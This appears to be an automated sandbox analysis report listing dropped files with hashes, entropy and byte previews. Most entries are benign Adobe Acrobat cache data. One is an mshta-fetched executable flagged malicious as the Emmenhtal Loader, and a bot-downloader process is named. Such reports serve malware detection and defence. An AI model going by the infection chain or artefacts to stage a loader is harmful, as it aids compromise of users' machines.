                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.3038900422253965
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJf8dPeUkwRe9:YvXKXFJuWkZc0vjGU8Ukee9
                                              MD5:D6F9D0E0FC0C51B09FCF03DF00F37B2E
                                              SHA1:F59AF2A12EC399343103EBB517CB994E94790523
                                              SHA-256:4DA32A23CE3BFA1DBD8DEF469FE1B233420530B43625640A6EF2BA8DC7255431
                                              SHA-512:E3119A88B846A07FEC3BEB9A7CB10835296E0BFDFA27670F98ADA59C614F212AFA60727789386786B9BF2AD43B63815CF6D6D88FB6E8E08F8DEE66522B885716
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):292
                                              Entropy (8bit):5.30891593456332
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfQ1rPeUkwRe9:YvXKXFJuWkZc0vjGY16Ukee9
                                              MD5:E0FBD494AD3183857329DBA87B372EA7
                                              SHA1:D74A17B68F41634CB8BE43D8059084A61326644D
                                              SHA-256:605CAF064CBA98D17A2DC17311CCDD87A0C858A37BDD59BFD177248E23D43792
                                              SHA-512:2A57D1079BB762A4D43BB80DBC36A851B1272C8FD977C62CA8940FDC217A9894A2AC670280DCA029837D8715FCB483D5E29672DE17F0E688862C734C39957F26
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.3118571891186885
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfFldPeUkwRe9:YvXKXFJuWkZc0vjGz8Ukee9
                                              MD5:AC87AF9DF534AD75EA79FE4250EE0A62
                                              SHA1:D38B1CE3F047AFF7BA1C6E0A86A695E1BAEE19C9
                                              SHA-256:336FE13BBFFEAD171B149BF16F4CE59AED3C1483DB5847DC9CFCCFC9D68143E8
                                              SHA-512:B00756A8D8B3A53BAA0A71A4E4D53C41E29FEA6C102B4386F5C685B71647793A50EF28DE98B743423C074B034E729CE331C12BD02FD6EB4B155C9BF6AF6C40A2
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):295
                                              Entropy (8bit):5.328904546985018
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfzdPeUkwRe9:YvXKXFJuWkZc0vjGb8Ukee9
                                              MD5:F5D30EFC3C84E6E95885C5E80FA2C806
                                              SHA1:C645B660ABC2FB231A7139428AC60A8CCBAEF846
                                              SHA-256:4EEA00CE427EDCB94858D312801157DF8BDF082B352BFD5121CD92C97136BCAD
                                              SHA-512:E24FD70427D30B4138C3184B2A93528BF19DD74D01254192784E55D68BBF72B7BA64F4B7F68A30F08A4A47552991A798971E4A0D0DBE5CBE6935348DD4E420A6
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.310286708353901
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfYdPeUkwRe9:YvXKXFJuWkZc0vjGg8Ukee9
                                              MD5:6CCDAFBE48A7D621DA9C1EDFFD054774
                                              SHA1:0DA5E5E6BCFD9C27AA85833A27EC6D38C14C77D8
                                              SHA-256:44B74EF5F86B62A4442A86B90F281558D274AE1CB73B6CCD2007EDF67C5C939D
                                              SHA-512:8138202273A3E5F2BDAD398BD87633205A06D9385960FA8B745AE3D169CD2D9821C8E9EAC2984D4C8C733CA2D8628F1525DDC081C01533806B42C5711C0215E8
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):284
                                              Entropy (8bit):5.296200483664049
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJf+dPeUkwRe9:YvXKXFJuWkZc0vjG28Ukee9
                                              MD5:62B637B3589A19A9644019E424E1D813
                                              SHA1:2FDD1F4283F5EEEB03FE8627611440AC339143C7
                                              SHA-256:B01833BF137D891F170EC34DA7CD4AB872F71D818D086FAA35AAFB3F7CAE0C3B
                                              SHA-512:B9D150212D57569EB68A93D77F044C99BB417A958EFA1A53937A160751018941BF79A1D49A5FA132CF89EBE42A035D91E978CDDB59BBBDBF1875DADC3D61E8F6
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):291
                                              Entropy (8bit):5.2937631070012765
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfbPtdPeUkwRe9:YvXKXFJuWkZc0vjGDV8Ukee9
                                              MD5:A61D80D01555384B515FE8F86CA055E1
                                              SHA1:B1A809C139DF867E6435417E5EDB266DBDD42211
                                              SHA-256:EDF7140BBCA03C8AB1A4C93DA946522D7A830FFAE583F9595AE40B605AF1C786
                                              SHA-512:6D0D45D9874FBB818203805E24EE94D398F754F0E9A730EF3BA8D64652ABF569DD9126381BA76CA0547242B428DEED2C12D4FB927EC2A3E6CBEB905603BD5ECA
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):287
                                              Entropy (8bit):5.2991322197961095
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJf21rPeUkwRe9:YvXKXFJuWkZc0vjG+16Ukee9
                                              MD5:AA5B630CFBA0B6340E9BA20E359204E0
                                              SHA1:8EBB95F85FDB38EAC1C56618595E9D1D297BF347
                                              SHA-256:47CD38D0D156A9A344EE16FF6243C7ADE6384A3903B292831DCF1643C165887A
                                              SHA-512:48E3A73C8D4FD6E74B7929804937725995E1B517B3878D33C3EB26132ACF62C4D4B35FA574A9CE023025AC27028D2D2C05A743832DBE6903543874D785AB8946
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1090
                                              Entropy (8bit):5.663665972612904
                                              Encrypted:false
                                              SSDEEP:24:Yv6XPunzvMamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS2:YvUYyBgkDMUJUAh8cvM2
                                              MD5:AB2A6AD0176061240E4DA85973E60A2B
                                              SHA1:D7727F17650362A031286B1EA027F2F08C8ABA72
                                              SHA-256:714224351BC8B98100412C7802CA6C1566F7F03012F4436D4823B8421EDEE6E6
                                              SHA-512:E5C21AE8CCC9126E98BCA4F71A1249461F6F808ACAB4C0FE498B6172DF259B25C1E3D9ACDD25E3E857DF5034E9AB3EF596A623E4B9936795E9886AEF4A486C7E
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):286
                                              Entropy (8bit):5.272777459700605
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfshHHrPeUkwRe9:YvXKXFJuWkZc0vjGUUUkee9
                                              MD5:E354388E7DC713F4EADA8DE5E82235B9
                                              SHA1:CA0CF00D953F136F31166A8230F87D100876BE4C
                                              SHA-256:9CF40654ED2DC23895D281D314109BB20B1CB10A479F6C2210E65513E2E43074
                                              SHA-512:03892CF46B21175E817C36AF4A0BDE7C39FFEFC3AC241D519E30A015E6BEA714D157D6223D4AC236B77FEC838549E56E60C627FBE3A59A9901291F3FE4CB6DDB
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):282
                                              Entropy (8bit):5.2808559843194365
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJTqgFCrPeUkwRe9:YvXKXFJuWkZc0vjGTq16Ukee9
                                              MD5:D94FF5B0EF1483401597DD66DD715EA7
                                              SHA1:74969632DA8C4F9AAEC035CCBD7E049EBDC23DAC
                                              SHA-256:015A44A0DEEEDA9FFEAED9C627F70B6328DF9383DE0F40A7EDF57BA72FD42D81
                                              SHA-512:33DE31287D301EC26AD84ACDA5338033FD578A0F129052BF8865A108B4C62038150CB0E6F63DC43832B1DCA9C2DB413FF504BF096C175904ACA8CEB2706E2A04
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4
                                              Entropy (8bit):0.8112781244591328
                                              Encrypted:false
                                              SSDEEP:3:e:e
                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                              Malicious:false
                                              Preview:....

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):2814
                                              Entropy (8bit):5.141019237621888
                                              Encrypted:false
                                              SSDEEP:24:YMnvGasmayETJ7DeBBqMJOcYkkjxv3v3oAPjb3j0SSfNYzC2o12LSSRCRLX5QCKF:YBRe3zOc+JrbzUfF1COJV4v95
                                              MD5:B28B8C5F77326243E8C1834E4488596B
                                              SHA1:907DE143FF4333040D1884EB6409226FBCAB71DF
                                              SHA-256:82F4B31826848A8CB05392D2FF90093FE1AD32F32278DB39BADE196FC0C908D1
                                              SHA-512:885EF6D8EEE62BE5E0D34428F0F0307B48C44F9B1FBABEA0A154E597F33AB00FD524806ADD559133CF84AC4B41318284AAD2E3DDF86003A3C7C14FD70AC74899
                                              Malicious:false
                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"a5e444134f07c99cdcbf6207a6bd76d8","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736070249000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7d05a432e2f367456846041237354966","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736070249000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d4dbf4aa6433e25deda890b014512855","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736070249000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"68e1f0df2f2488314d85b2489aa6c91e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736070249000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"a2cb6d219337b5de5a9a83c2a9d20e5f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736070249000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"61dc1b24f98d14a1e7184efdd60ba2c9","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):1.18661590605189
                                              Encrypted:false
                                              SSDEEP:48:TGufl2GL7msEHUUUUUUUUiSvR9H9vxFGiDIAEkGVvp4:lNVmswUUUUUUUUi+FGSItE
                                              MD5:648577C521C75EAA64ACD5F574194ECE
                                              SHA1:D6D300B6741286431FCA03D69645285B5DBCBC32
                                              SHA-256:49A69E58225F7D66BD30E409B15AA81285C4EA13A179766E6BF2C33C38D67C90
                                              SHA-512:1D1DD713079D42DDE081A82C3062ED2D9F8439302EC7AB873D335ED3A25EC967C44E4D7003C4604ABCC78DB6884FD67E06F44C5E2C91998D8A34D0B7B3ED8866
                                              Malicious:false
                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite Rollback Journal
                                              Category:dropped
                                              Size (bytes):8720
                                              Entropy (8bit):1.6070492881431113
                                              Encrypted:false
                                              SSDEEP:48:7M6KUUUUUUUUUUwvR9H9vxFGiDIAEkGVvU5qFl2GL7msa:7qUUUUUUUUUUIFGSItEKVmsa
                                              MD5:46B1B60F970914220D61E7FD8BF51D8A
                                              SHA1:79DEC0080D195C027B59BE7DDB2DCBD040CCAAF2
                                              SHA-256:861FF62735C8B4C9F5A5948D22785CAF5F0802B7FF625BA4D5ABFDFF0301C498
                                              SHA-512:3D1F1AF39E2CE6A753086BCAAF44AE5D30DA4E9090C8B4BD51C303918101F0B17634C1FFBA66E56558B710583939391E311DAA4865D69B2CCED09C387E32BAE4
                                              Malicious:false
                                              Preview:.... .c.......).......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):66726
                                              Entropy (8bit):5.392739213842091
                                              Encrypted:false
                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgud3bs/VbbxPmpHdYdQrJDQbYyu:6a6TZ44ADEudLs/VbbxoXsK
                                              MD5:67CBDE3EDCAD58743D838DD419C58655
                                              SHA1:E0553E7B45055EC2724B032FA9BD33F6BCD51F0A
                                              SHA-256:941EFAE689E05C721B60B51267D79D5A1EE7C8655D180EAA0B1806300F5712CF
                                              SHA-512:14372F2B216C4B3D2D6A3CB3FDFC1570F74751B4B8CEC4B05162E1EB048BA2D2525726D4C942B3108CEB8C4CAEA0EA9287EB5C6307EACE2743E987E6A23AF27C
                                              Malicious:false
                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1]

                                              Download File
                                              Process:C:\Windows\System32\mshta.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1434675
                                              Entropy (8bit):6.961837071515437
                                              Encrypted:false
                                              SSDEEP:24576:nuChr47tuChr47WuChr47CuChr47YuChr47:nuM47tuM47WuM47CuM47YuM47
                                              MD5:F74C9109DAE882D15088B4AD8E5BB29D
                                              SHA1:86A0F44B0A680422DF75A36909FBB396DF64C2D7
                                              SHA-256:FB04434388B4A26804151BA2E73B9D371B9FEA930541C08243560BAAC94C2FDB
                                              SHA-512:470153FFAC01DF9F8B8197F1F4489DAB0EE0806558D0736A0A5BA2CA07B7F1BF64BE7DC1F1555DF37874691FB0CC611AF91B16EBA01F53FED7BB3720A8D56E3D
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_EmmenhtalLoader, Description: Yara detected Emmenhtal Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], Author: Joe Security
                                              • Rule: emmenhtal_strings_hta_exe, Description: Emmenhtal Loader string, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], Author: Sekoia.io
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,.SXh.=.h.=.h.=...>.k.=...9...=...8.o.=...<.s.=.h.<...=...4.z.=.....i.=...?.i.=.Richh.=.................PE..L.....L......................l....................@..........................p......U`....@...... ...................................0..h'...................`...... -..T...........................(................................................text...D........................... ..`.data...d...........................@....idata...'.......(..................@..@.rsrc...h'...0...(..................@..@.reloc.......`.......6..............@..B................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\php-8.2.11-Win32-vs16-x64[1].zip

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                              Category:dropped
                                              Size (bytes):31886616
                                              Entropy (8bit):7.996327176919507
                                              Encrypted:true
                                              SSDEEP:786432:4Dz+kmvQr7HvMeqWGbmv9+0/NyvLkuPO/oNGtbogIX+xzBYR6GuSZ:4DzvmYr7HsbaYOYKHzBYR6GP
                                              MD5:29C9E2CDE366197C69D233D35E7B37EC
                                              SHA1:3D2F575DBCE04912774D71D89397D993BF60AAFB
                                              SHA-256:F5651BFB5DE738EA1A0E361EB2057DFAB93E0BAC52B3BEC67DFA7A329E1887E7
                                              SHA-512:D7EE3C97E72209537519E04E3D2182385E0B3A8BA575F0D581CEE3C1F82ABAD79E74BF02929C9356A93E71473A06AE4E7776E3353272FAF29EFD7FD8FDCB16A9
                                              Malicious:false
                                              Preview:PK.........b$Z................php-8.2.11-Win32-vs16-x64/PK..........:W.Y.........'...php-8.2.11-Win32-vs16-x64/deplister.exe.\i|T....%..M$.....6..@.&N.y.....H@.E$.Y..J..$.I4..(m.b.-...@[..."[....%...F4.&.....o&..]~..../..].=..s.=..s.}..o.,. X..uAh..?.......|g..\..&...[..[.\.j.Uw....V...9W..p....7c.....,.6##...1.'.l..{/..m.~:...=]..[O..^..gO.........I<......}o6.....m.=...............E..n..!.9J.b...F..ax8.. ....!.'....H..A.P.)^..54~APx.#.P4..n....A....&...&a.g........L.R.._..Z....7...[..8...U...%..~`..~..-x.....Z.L.:.:......E.]...>.....G..[8.'.*!.........Z.|E.......x_t.\....!.JXq9...+.ou9........E.3...)......2..U&G2..&A.D.F...D..(..?.._rhOA.~.oH-.v.].5.0..&9.s.....$...........2..H&A..r..V.../5.......J{..2.5O....)..j...}o.@K..8...#.......H..A].&y....q.m...IT.[.G.f..uxg...({t..Kl.n..........C.s.6.rmT..~.....xi.V<.2.....hp&.k.l.S..i...T..B...m+/s.}.'.8f.._......I.W.....I.].0.....^.P~..y.<..$.|.....}.l.....r......oLT.X.y...{.....H.Q.q..,....1H.k.

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................

                                              C:\Users\user\AppData\Local\Temp\MSI4d1a1.LOG

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):246
                                              Entropy (8bit):3.505069684106714
                                              Encrypted:false
                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8wWClQOnH:Qw946cPbiOxDlbYnuRKA+H
                                              MD5:99EFC675032ABAF75C0206F8F91CE035
